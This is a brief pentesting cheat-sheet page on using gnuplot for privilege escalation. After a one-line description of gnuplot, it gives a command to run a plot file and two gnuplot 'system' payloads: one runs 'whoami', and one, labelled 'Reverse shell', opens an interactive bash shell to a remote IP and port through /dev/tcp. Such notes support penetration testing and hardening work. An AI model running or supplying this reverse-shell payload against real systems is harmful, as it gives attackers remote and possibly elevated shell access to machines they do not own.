Gnuplot Privilege Escalation
gnuplot is a command-line and GUI program that can generate two- and three-dimentional plots of functions, data, and data fits.
gnuplot test.plt
Copied!system "whoami"
# Reverse shell
system "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"
Copied!References
Last updated
